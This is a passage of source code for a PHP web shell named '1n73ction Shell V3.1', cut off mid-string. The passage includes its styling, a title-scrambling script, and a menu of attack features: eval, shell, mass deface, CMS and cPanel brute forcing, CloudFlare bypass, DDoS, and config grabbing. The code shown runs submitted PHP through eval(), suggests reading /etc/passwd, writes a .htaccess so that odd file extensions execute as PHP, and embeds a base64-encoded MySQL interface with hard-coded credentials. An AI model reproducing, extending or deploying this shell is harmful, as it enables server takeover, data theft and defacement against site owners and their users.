4px;\r\n}\r\n.jaya{ font-family: ;}\r\n\r\n.b374k{\r\n\tfont-size:30px;\r\n\tpadding:0;\r\n\tcolor:#444444;\r\n}\r\n.b374k_tbl{\r\n\ttext-align:center;\r\n\tmargin:0 4px 0 0;\r\n\tpadding:0 4px 0 0;\r\n\tborder-right:1px solid #333333;\r\n}\r\n.phpinfo table{\r\n\twidth:100%;\r\n\tpadding:0 0 0 0;\r\n}\r\n.phpinfo td{\r\n\tbackground:#111111;\r\n\tcolor:#cccccc;\r\npadding:6px 8px;;\r\n}\r\n.phpinfo th, th{\r\n\tbackground:#191919;\r\n\tborder-bottom:1px solid #333333;\r\nfont-weight:normal;\r\n}\r\n.phpinfo h2, .phpinfo h2 a{\r\n\ttext-align:center;\r\n\tfont-size:16px;\r\n\tpadding:0;\r\n\tmargin:30px 0 0 0;\r\n\tbackground:#222222;\r\n\tpadding:4px 0;\r\n}\r\n.explore{\r\nwidth:100%;\r\n}\r\n.explore a {\r\ntext-decoration:none;\r\n}\r\n.explore td{\r\nborder-bottom:1px solid #333333;\r\npadding:0 8px;\r\nline-height:24px;\r\n}\r\n.explore th{\r\npadding:3px 8px;\r\nfont-weight:normal;\r\n}\r\n.explore th:hover , .phpinfo th:hover{\r\nborder-bottom:1px solid #00ff00;\r\n}\r\n.explore tr:hover{\r\nbackground:#111111;\r\n}\r\n.viewfile{\r\nbackground:#EDECEB;\r\ncolor:#000000;\r\nmargin:4px 2px;\r\npadding:8px;\r\n}\r\n.sembunyi{\r\ndisplay:none;\r\npadding:0;margin:0;\r\n}\r\n\r\n</style></head>\r\n<script language=\'javascript\'>\r\nif (document.all||document.getElementById){\r\nvar thetitle=document.title\r\ndocument.title=\'\'\r\n}\r\nvar data="Us3 Y0ur br41n biTch ! ! !";\r\nvar done=1;\r\nfunction statusIn(text){\r\ndecrypt(text,22,22);\r\n}\r\nfunction statusOut(){\r\nself.status=\'\';\r\ndone=1;\r\n}\r\nfunction decrypt(text, max, delay){\r\nif (done){\r\ndone = 0;\r\nrantit(text, max, delay, 0, max);\r\n} \r\n}\r\nfunction rantit(text, runs_left, delay, charvar, max){\r\nif (!done){\r\nruns_left = runs_left - 1;\r\nvar status = text.substring(0,charvar);\r\nfor(var current_char = charvar; current_char < text.length; current_char++){\r\nstatus += data.charAt(Math.round(Math.random()*data.length));\r\n}\r\ndocument.title = status;\r\nvar rerun = "rantit(\'" + text + "\'," + runs_left + "," + delay + "," + charvar + "," + max + ");"\r\nvar new_char = charvar + 1;\r\nvar next_char = "rantit(\'" + text + "\'," + max + "," + delay + "," + new_char + "," + max + ");"\r\nif(runs_left > 0){\r\nsetTimeout(rerun, delay);\r\n}\r\nelse{\r\nif (charvar < text.length){\r\nsetTimeout(next_char, Math.round(delay*(charvar+3)/(charvar+1)));\r\n}\r\nelse\r\n{\r\ndone = 1;\r\n}\r\n}\r\n}\r\n}\r\nif (document.all||document.getElementById)\r\nstatusIn(thetitle)\r\n</script>\r\n\r\n<body onLoad="document.getElementById(\'cmd\').focus();">\r\n<div class="main">\r\n<!-- head info start here -->\r\n<div class="head_info">\r\n<table ><tr>\r\n<td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="http://www.fbvideo.16mb.com/files/1n73ction.png" /></span></a></td></tr><tr><td><b>1n73ction Shell V3.1 [ Special Edition ]</b></td></tr></table></td>\r\n<td><?php echo $buff; ?></td>\r\n</tr></table>\r\n</div>\r\n<!-- head info end here -->\r\n<!-- menu start -->\r\n<center><div id="menu">\r\n<a href="?<?php echo "y=".$pwd; ?>"><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxQ2GRnu/TgAAAJzSURBVDjLtZLPSxtBHMXf5semZDfS7KpIaWzRShoFD5UK9h6ai5eCPfZkwYJ4kF566a30H0gF24BUqDdjBT1VCFIsNBUWEw+ha2obpDGUXGR1Z7KZ+fbQRky1vfULAzPD4/MeMw/4H7O6ugoAsG17tFwuJwFgd3f3Qq3yN0g+n7+r6/oKgEtQMDWYGHx5kc539rC4uAgA2Hy/OaGq6oplWaVcLmdxxl9YlvUEALa2tv6dYGPjXSoS6chWKpWKaZpdoVBIL5VK+0NDQ/1END02NjZ/LsHc3BwAYG1tbSIYVLOFQuGzpmldgUDAkFKqvb2917a3t23GWDqXyz0BgPX19fYEy8vLKV3XswcHBxXDMLoikYghpaRW0kajwfbK5W834/F+ANOpVGr+FLC0tHRf0/TX+/tf7J6eniuappkA6IwBtSC2bX9NJBIDRPT05OTkuTL1aKpj9Pbox1qtdmgYxlXTNG8QEV3wPgRAcV23bllWfmRkZNh13VuKpmnBvr6+O1LK2szMzNtwOBxviYUQUBQFPp+vBYCU8jCTyaSOj48vA/hw6jI+Ph5JJpOfwuFwnIjAGKsvLCw8cxxHTE4+fGwY0RgRgYi+O44zPDs7W2/rgeu6CmMMjDFwziGE+JFIJF5Vq9VMs+kdcs7BOQdjDEdHR6fGgdZGCAHOOfx+P4gIQggZjUaps9OkRqNBjDHQr1E8z8M5QLVaheM4TZ/fBxDQbDZVz/MgJYFzHlRVFURQms2GqNfr4qIm+mOx2L3u7u5hKSVCIXVPSvGmsFNUBuLxB8FA4DoAeJ63UywWswBk2x+l0+kW0P97KX80tnXfNj8B5NE5DOMV2T0AAAAASUVORK5CYII=\' height="18" width="34"></a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">Shell</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=php">Eval</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=sql">Mysql</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=dump">Database Dump</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">Php Info</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Net Sploit</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">Upload</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">E-Mail</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner">SQLI Scan</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=port-sc">Port Scan</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=dos">Ddos</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=tool">Tools</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=python">python</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">Symlink</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=config">Config</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=bypass">Bypass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cgi">CgiShell</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cgi2012">CGI Telnet 2012</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=domain">Domain</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jodexer">Joomla IndChange</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=vb">VB IndChange</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">Wordpress ResPass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">Joomla ResPass</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">WHMCS Decoder</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=zone">Zone-H</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=mass">Mass Deface</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=wpbrute">Wordpress BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jbrute">Joomla BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=brute">Cpanel BruteForce</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=bypass-cf">Bypass CloudFlare</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=adfin">Admin Finder</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=hash">Password Hash</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=hashid">Hash ID</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=string">Script Encode</a><br><br>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=whois">Website Whois</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=jss">Joomla Server Scanner</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=cms_detect">Cms Detector</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=tutor">Tutorial & Ebook</a>\r\n<a href="?<?php echo "y=".$pwd; ?>&amp;x=about">About</a>\r\n<a href="?<?php echo "y=".$pwd;\t?>&amp;x=logout">Log-Out</a>\r\n\r\n\r\n</div></center>\r\n<!-- menu end -->\r\n\r\n<?php\r\n@ini_set(\'display_errors\', 0);\r\nif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'php\')){ ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">\r\n<table class="cmdbox">\r\n<tr><td>\r\n<textarea class="output" name="cmd" id="cmd">\r\n<?php\r\nif(isset($_POST[\'submitcmd\'])) {\r\n\techo eval(magicboom($_POST[\'cmd\']));\r\n}\r\nelse echo "echo file_get_contents(\'/etc/passwd\');";\r\n?>\r\n</textarea>\r\n<tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>\r\n</table>\r\n</form>\r\n\r\n<?php } \r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'sql\'))\r\n    {\r\n    ?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=sql" method="post">\r\n<?php\r\necho "<center/><br/><b><font color=#00ff00>+--==[ Mysql Interface ]==--+</font></b><br><br>";\r\n  mkdir(\'mysql\', 0755);\r\n    chdir(\'mysql\');\r\n        $akses = ".htaccess";\r\n        $buka_lah = "$akses";\r\n        $buka = fopen ($buka_lah , \'w\') or die ("Error cuyy!");\r\n        $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\r\nAddType application/x-httpd-php .cpc\r\n";    \r\n        fwrite ( $buka , $metin ) ;\r\n        fclose ($buka);\r\n$sqlshell = \'PD8NCiRQQVNTV09SRCA9ICJyb290X3hoYWhheCI7DQokVVNFUk5BTUUgPSAieGhhaGF4IjsNCmlmICggZnVuY3Rpb25fZXhpc3RzKCdpbmlfZ2V0JykgKSB7DQoJJG9ub2ZmID0gaW5pX2dldCgncmVnaXN0ZXJfZ2xvYmFscycpOw0KfSBlbHNlIHsNCgkkb25vZmYgPSBnZXRfY2ZnX3ZhcigncmVnaXN0ZXJfZ2xvYmFscycpOw0KfQ0KaWYgKCRvbm9mZiAhPSAxKSB7DQoJQGV4dHJhY3QoJEhUVFBfU0VSVkVSX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfQ09PS0lFX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfUE9TVF9GSUxFUywgRVhUUl9TS0lQKTsNCglAZXh0cmFjdCgkSFRUUF9QT1NUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfR0VUX1ZBUlMsIEVYVFJfU0tJUCk7DQoJQGV4dHJhY3QoJEhUVFBfRU5WX1ZBUlMsIEVYVFJfU0tJUCk7DQp9DQoNCmZ1bmN0aW9uIGxvZ29uKCkgew0KCWdsb2JhbCAkUEhQX1NFTEY7DQoJc2V0Y29va2llKCAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKTsNCglzZXRjb29raWUoICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICk7DQoJZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgaGVpZ2h0PTEwMCU+PHRyPjx0ZD48Y2VudGVyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9Mj48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjx0YWJsZSBjZWxscGFkZGluZz0yMD48dHI+PHRkPjxjZW50ZXI+XG4iOw0KCWVjaG8gIjxoMT5NeVNRTCBJbnRlcmZhY2UgQnkgUzRNUDRIPC9oMT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Ykc5bmIyNWZjM1ZpYldsMD5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxwYWRkaW5nPTUgY2VsbHNwYWNpbmc9MT5cbiI7DQoJZWNobyAiPHRyPjx0ZCBjbGFzcz1cIm5ld1wiPkhvc3RuYW1lIDwvdGQ+PHRkPiA8aW5wdXQgdHlwZT10ZXh0IG5hbWU9aG9zdG5hbWUgdmFsdWU9J2xvY2FsaG9zdCc+PC90ZD48L3RyPlxuIjsNCgllY2hvICI8dHI+PHRkIGNsYXNzPVwibmV3XCI+VXNlcm5hbWUgPC90ZD48dGQ+IDxpbnB1dCB0eXBlPXRleHQgbmFtZT11c2VybmFtZT48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjx0cj48dGQgY2xhc3M9XCJuZXdcIj5QYXNzd29yZCA8L3RkPjx0ZD4gPGlucHV0IHR5cGU9cGFzc3dvcmQgbmFtZT1wYXNzd29yZD48L3RkPjwvdHI+XG4iOw0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nRW50ZXInPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1yZXNldCB2YWx1ZT0nQ2xlYXInPjxicj5cbiI7DQoJZWNobyAiPC9mb3JtPlxuIjsNCgllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJZWNobyAiPC9jZW50ZXI+PC90ZD48L3RyPjwvdGFibGU+XG4iOw0KCWVjaG8gIjxwPjxociB3aWR0aD0zMDA+XG4iOw0KCWVjaG8gIjwvY2VudGVyPjwvdGQ+PC90cj48L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbG9nb25fc3VibWl0KCkgew0KCWdsb2JhbCAkdXNlcm5hbWUsICRwYXNzd29yZCwgJGhvc3RuYW1lICwkUEhQX1NFTEY7DQoJaWYoJGhvc3RuYW1lID09JycpDQoJCSRob3N0bmFtZSA9ICdsb2NhbGhvc3QnOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl91c2VybmFtZSIsICR1c2VybmFtZSApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIsICRwYXNzd29yZCApOw0KCXNldGNvb2tpZSggIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIsICRob3N0bmFtZSApOw0KCWVjaG8gIjxNRVRBIEhUVFAtRVFVSVY9UmVmcmVzaCBDT05URU5UPScwOyBVUkw9JFBIUF9TRUxGP2FjdGlvbj1iR2x6ZEVSQ2N3PT0nPiI7DQp9DQoNCmZ1bmN0aW9uIGVjaG9RdWVyeVJlc3VsdCgpIHsNCglnbG9iYWwgJHF1ZXJ5U3RyLCAkZXJyTXNnOw0KCWlmKCAkZXJyTXNnID09ICIiICkgJGVyck1zZyA9ICJTdWNjZXNzIjsNCglpZiggJHF1ZXJ5U3RyICE9ICIiICkgew0KCQllY2hvICI8dGFibGUgY2VsbHBhZGRpbmc9NT5cbiI7DQoJCWVjaG8gIjx0cj48dGQ+UXVlcnk8L3RkPjx0ZD4kcXVlcnlTdHI8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8dHI+PHRkPlJlc3VsdDwvdGQ+PHRkPiRlcnJNc2c8L3RkPjwvdHI+XG4iOw0KCQllY2hvICI8L3RhYmxlPjxwPlxuIjsNCgl9DQp9DQoNCmZ1bmN0aW9uIGxpc3REYXRhYmFzZXMoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJFBIUF9TRUxGOw0KCWVjaG8gIjxoMT5EYXRhYmFzZXMgTGlzdDwvaDE+XG4iOw0KCWVjaG8gIjxmb3JtIGFjdGlvbj0nJFBIUF9TRUxGJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWNyZWF0ZURCPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBEYXRhYmFzZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGhyPlxuIjsNCgllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz01PlxuIjsNCgkkcERCID0gbXlzcWxfbGlzdF9kYnMoICRteXNxbEhhbmRsZSApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBEQiApOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRkYm5hbWUgPSBteXNxbF9kYm5hbWUoICRwREIsICRpICk7DQoJCWVjaG8gIjx0cj5cbiI7DQoJCWVjaG8gIjx0ZD4kZGJuYW1lPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWxpc3RUYWJsZXMmZGJuYW1lPSRkYm5hbWUnPlRhYmxlczwvYT48L3RkPlxuIjsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcERCJmRibmFtZT0kZGJuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgRGF0YWJhc2UgXCckZGJuYW1lXCc/JylcIj5Ecm9wPC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kdW1wREImZGJuYW1lPSRkYm5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHVtcCBEYXRhYmFzZSBcJyRkYm5hbWVcJz8nKVwiPkR1bXA8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gY3JlYXRlRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2NyZWF0ZV9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbGlzdERhdGFiYXNlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRGF0YWJhc2UoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJFBIUF9TRUxGOw0KCW15c3FsX2Ryb3BfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCWxpc3REYXRhYmFzZXMoKTsNCn0NCg0KZnVuY3Rpb24gbGlzdFRhYmxlcygpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkUEhQX1NFTEY7DQoJZWNobyAiPGgxPlRhYmxlcyBMaXN0PC9oMT5cbiI7DQoJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9Y3JlYXRlVGFibGU+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IG5hbWU9dGFibGVuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0NyZWF0ZSBUYWJsZSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQoJZWNobyAiPGZvcm0gYWN0aW9uPSckUEhQX1NFTEYnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hY3Rpb24gdmFsdWU9cXVlcnk+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT10ZXh0IHNpemU9MTIwIG5hbWU9cXVlcnlTdHI+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT0nUXVlcnknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBUYWJsZSA9IG15c3FsX2xpc3RfdGFibGVzKCAkZGJuYW1lICk7DQoJaWYoICRwVGFibGUgPT0gMCApIHsNCgkJJG1zZyAgPSBteXNxbF9lcnJvcigpOw0KCQllY2hvICI8aDM+RXJyb3IgOiAkbXNnPC9oMz48cD5cbiI7DQoJCXJldHVybjsNCgl9DQoJJG51bSA9IG15c3FsX251bV9yb3dzKCAkcFRhYmxlICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJHRhYmxlbmFtZSA9IG15c3FsX3RhYmxlbmFtZSggJHBUYWJsZSwgJGkgKTsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiJHRhYmxlbmFtZVxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5EYXRhPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHJvcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0Ryb3AgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5Ecm9wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD5cbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZHVtcFRhYmxlJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0R1bXAgVGFibGUgXCckdGFibGVuYW1lXCc/JylcIj5EdW1wPC9hPlxuIjsNCgkJZWNobyAiPC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPiI7DQp9DQoNCmZ1bmN0aW9uIGNyZWF0ZVRhYmxlKCkgew0KDQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkNSRUFURSBUQUJMRSAkdGFibGVuYW1lICggbm8gSU5UICkiOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJbXlzcWxfcXVlcnkoICRxdWVyeVN0ciwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJbGlzdFRhYmxlcygpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wVGFibGUoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkRST1AgVEFCTEUgJHRhYmxlbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCglsaXN0VGFibGVzKCk7DQp9DQoNCmZ1bmN0aW9uIHZpZXdTY2hlbWEoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJZWNobyAiPGgxPlRhYmxlIFNjaGVtYTwvaDE+XG4iOw0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvUXVlcnlSZXN1bHQoKTsNCgllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWFkZEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRmllbGQ8L2E+IHwgXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5WaWV3IERhdGE8L2E+XG4iOw0KCWVjaG8gIjxocj5cbiI7DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgIlNIT1cgZmllbGRzIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkbnVtID0gbXlzcWxfbnVtX3Jvd3MoICRwUmVzdWx0ICk7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9NT5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+RmllbGQ8L3RoPlxuIjsNCgllY2hvICI8dGg+VHlwZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5OdWxsPC90aD5cbiI7DQoJZWNobyAiPHRoPktleTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5EZWZhdWx0PC90aD5cbiI7DQoJZWNobyAiPHRoPkV4dHJhPC90aD5cbiI7DQoJZWNobyAiPHRoIGNvbHNwYW49Mj5BY3Rpb248L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCg0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2FycmF5KCAkcFJlc3VsdCApOw0KCQllY2hvICI8dHI+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIkZpZWxkIl0uIjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+Ii4kZmllbGRbIlR5cGUiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiTnVsbCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJLZXkiXS4iPC90ZD5cbiI7DQoJCWVjaG8gIjx0ZD4iLiRmaWVsZFsiRGVmYXVsdCJdLiI8L3RkPlxuIjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJFeHRyYSJdLiI8L3RkPlxuIjsNCgkJJGZpZWxkbmFtZSA9ICRmaWVsZFsiRmllbGQiXTsNCgkJZWNobyAiPHRkPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZWRpdEZpZWxkJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJmZpZWxkbmFtZT0kZmllbGRuYW1lJz5FZGl0PC9hPjwvdGQ+XG4iOw0KCQllY2hvICI8dGQ+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kcm9wRmllbGQmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmZmllbGRuYW1lPSRmaWVsZG5hbWUnIG9uQ2xpY2s9XCJyZXR1cm4gY29uZmlybSgnRHJvcCBGaWVsZCBcJyRmaWVsZG5hbWVcJz8nKVwiPkRyb3A8L2E+PC90ZD5cbiI7DQoJCWVjaG8gIjwvdHI+XG4iOw0KCX0NCgllY2hvICI8L3RhYmxlPlxuIjsNCn0NCg0KZnVuY3Rpb24gbWFuY